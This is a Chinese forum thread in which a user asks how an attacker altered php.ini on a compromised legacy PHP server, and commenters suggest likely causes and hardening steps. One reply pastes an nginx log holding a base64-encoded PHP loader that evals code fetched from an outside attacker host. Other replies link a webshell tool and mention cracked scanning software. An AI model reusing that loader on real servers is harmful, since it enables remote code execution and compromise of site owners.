V2EX = way to explore
V2EX 是一个关于分享和探索的地方
现在注册
已注册用户请  登录
ydpro
V2EX  ›  信息安全

服务器被攻击了,安全大佬来看下这是怎么攻击的

  •  
  •   ydpro · 261 天前 · 5932 次点击
    这是一个创建于 261 天前的主题,其中的信息可能已经有所发展或是发生改变。

    用来跑老项目的服务器的 php.ini 里面的 auto_prepend_file 和 allow_url_include 被修改了,导致请求返回的内容出现了问题,有没有大佬说下这是怎么修改的

    40 条回复    2024-04-15 08:00:06 +08:00
    luoyide2010
        1
    luoyide2010  
       261 天前   ❤️ 2
    大概是有漏洞被拿到权限呗,除非你能提供源码或者远控环境,单凭几个字描述怎么可能定位到问题?
    xuanbg
        2
    xuanbg  
       261 天前   ❤️ 7
    我不是什么安全大佬,我只会一招,就是开白名单。除了 80 和 443 ,其他端口只能我自己的 ip 可以访问。从 2000 年至今 24 年了,服务器都换过好几茬了,从来没有被攻破过。
    tunggt
        3
    tunggt  
       261 天前
    你这只能一点一点排查,就你说的只有这点内容,谁都没法给你解决办法
    kokutou
        4
    kokutou  
       261 天前 via Android
    把软件都升到最新吧。。。
    Seanfuck
        5
    Seanfuck  
       261 天前
    SSH 被爆破了?看下日志
    pota
        6
    pota  
       261 天前
    你这相当于啥都没说啊。。
    dhb233
        7
    dhb233  
       261 天前
    把你的 IP 、域名放出来,看看有没有大佬给你再攻破了
    344457769
        8
    344457769  
       261 天前
    PHP 很多漏洞可以 getshell ,排查一下 PHP 系统框架版本,找找业务方面的漏洞,重点关注一下上传图片上传文件的逻辑有没有做文件类型判断,把危险的请求体给过滤下,系统数据做好备份后更新下软件吧。
    miyuki
        9
    miyuki  
       261 天前
    1. php 网站程序漏洞被 getshell 了(被植入恶意指令)
    2. ssh 弱密码被破解了
    3. 其它程序比如 redis 没做好安全防护

    很多很多可能
    Greenm
        10
    Greenm  
       261 天前
    描述这么少,问得这么简单,可能同样的字数仅有给 ssh 权限才能帮你排查出来了。
    opengps
        11
    opengps  
       261 天前
    @xuanbg 你这样还不够,系统自身漏洞没堵上,我遇到过有人利用我的上传没处理权限漏洞传进来一份木马脚本,还挺好用,可以直接执行 sql 语句
    xiao17
        12
    xiao17  
       261 天前
    @xuanbg 啥网站啊,我瞅瞅^_^
    oneisall8955
        13
    oneisall8955  
       261 天前
    psterman
        14
    psterman  
       261 天前
    @xuanbg 你成功引起了我的注意
    I2E
        15
    I2E  
       261 天前
    https://github.com/rebeyond/Behinder 之前被这个木马搞过
    carlinglm
        16
    carlinglm  
       261 天前
    @xuanbg #2 同道中人啊
    care
        17
    care  
       261 天前
    @xuanbg 请问下你的白名单 ip 是固定不变的吗?
    cruzzz
        18
    cruzzz  
       261 天前
    @xuanbg = =和大佬是一样的玩法。 只是有时候本地运营商强行断网( 3 个~4 个月),就到处换 IP ,笑死。
    xmlf
        19
    xmlf  
       261 天前 via Android   ❤️ 1
    @cruzzz ddns ,服务器 ping ,自动加入 iptables
    block0
        20
    block0  
       261 天前 via Android   ❤️ 1
    你用宝塔了?
    opengps
        21
    opengps  
       261 天前
    @oneisall8955 还是你狠,至今日志里天天都有一堆扫描器的痕迹
    l2d
        22
    l2d  
       261 天前 via Android
    任意文件写 or rce
    具体什么问题查流量日志的异常流量
    dzdh
        23
    dzdh  
       261 天前
    selinux 一开。完事。

    不要闲着没事蛋疼自己编译 php 。就用系统自带的。

    debian 系的用 https://packages.sury.org/php/

    rh 系的用 https://rpms.remirepo.net/

    开启 selinux / apparmor 就不可能修改到你的配置文件
    Remember
        24
    Remember  
       261 天前
    网站写的烂,被拿到 webshell 了。
    idc181906
        25
    idc181906  
       260 天前 via iPhone   ❤️ 1
    你不关闭 22 端口的吗,最近挺多漏扫的,还是关闭了吧。
    han1988
        26
    han1988  
       260 天前
    套 WAF 呀
    vcn8yjOogEL
        27
    vcn8yjOogEL  
       260 天前
    网页服务器套 SELinux, 嫌麻烦就上 Debian 用 AppArmor, 不过效果会差一点
    防火墙只开 80, 443 和一个随机的 ssh 端口
    ssh 白名单, 要是白名单的网段大就再上 fail2ban
    hefish
        28
    hefish  
       260 天前   ❤️ 4
    OP: 我有病,医生你快给我开药吧。。。
    医生: 要不说说哪儿不舒服?
    OP:我就是病了,你不是医生吗?快点开药啊。。。
    医生:。。。。
    weijancc
        29
    weijancc  
       260 天前   ❤️ 1
    就简单一句, 改为使用 ssh 密钥登录服务器, 禁用密码, 我的服务器都直接开放 22 端口的.
    catamaran
        30
    catamaran  
       260 天前
    网上找破解的 awvs ,自己扫描一下
    way2create
        31
    way2create  
       260 天前   ❤️ 1
    信息太少了,不过既然是 PHP 老项目,有一个可能是漏扫然后 getshell 了,之前服务器领导就部署了这种 shi 山老项目中招了,还好对方也没整什么大动作。。。emm 领导要这样搞我也管不着,只不过擦屁股有点烦
    justfindu
        32
    justfindu  
       260 天前
    啥信息都没有, log 也没有, 还想看看咋样的, 好自我加强一下
    luozic
        33
    luozic  
       260 天前   ❤️ 1
    安全问题,扫机器,看能不能处理,不能处理那就换个机器,把数据备份杀毒,再传新服务器-----这次在新机器上注意安全加固和扫一下自己的代码 部署的各个东西的版本有啥漏洞没
    ydpro
        34
    ydpro  
    OP
       260 天前
    上午太忙了,下面是 nginx 的部分报错信息

    2024/04/03 14:24:55 [error] 85023#0: *418871825 FastCGI sent in stderr: "PHP message: PHP Warning: file_get_contents( http://8.jsc20242.com:81/jsc/jsc.txt): failed to open stream: Connection timed out in data:;base64,PD9waHAgaW5pX3NldCgiZGlzcGxheV9lcnJvcnMiLCAib2ZmIik7ZXZhbCgnPz4nLmZpbGVfZ2V0X2NvbnRlbnRzKGJhc2U2NF9kZWNvZGUoJ2FIUjBjRG92THpndWFuTmpNakF5TkRJdVkyOXRPamd4TDJwell5OXFjMk11ZEhoMCcpKSk7Pz4=

    不知道攻击者怎么修改 php.ini 的 auto_prepend_file 和 allow_url_include
    sofukwird
        35
    sofukwird  
       260 天前 via Android   ❤️ 1
    搜一搜 PHP 高危漏洞,然后对比下你所使用的 PHP 版本,如果 PHP 版本比较老的话就会中招
    Metre
        36
    Metre  
       260 天前
    网址告诉我,我帮你做个漏扫评估
    GUSNYpU376k4Sx2V
        37
    GUSNYpU376k4Sx2V  
       260 天前   ❤️ 1
    @opengps #21 502 了
    coderzhangsan
        38
    coderzhangsan  
       260 天前   ❤️ 1
    大概率你用宝塔部署 php 环境了吧,如果你用宝塔装了,就又很大概率中招,建议你卸掉宝塔,重新部署环境吧,稍微学一下,部署 php 环境很简单的。
    way2create
        39
    way2create  
       259 天前
    @coderzhangsan 想起之前有个新来的主管问我为啥之前 Linux 服务器都不用宝塔 说脚本装的命令行维护太麻烦 换成他全装宝塔
    opengps
        40
    opengps  
       257 天前
    @Beeium frp 竟然被打挂了,是你干的不?
    关于   ·   帮助文档   ·   博客   ·   API   ·   FAQ   ·   实用小工具   ·   2580 人在线   最高记录 6679   ·     Select Language
    创意工作者们的社区
    World is powered by solitude
    VERSION: 3.9.8.5 · 26ms · UTC 04:58 · PVG 12:58 · LAX 20:58 · JFK 23:58
    Developed with CodeLauncher
    ♥ Do have faith in what you're doing.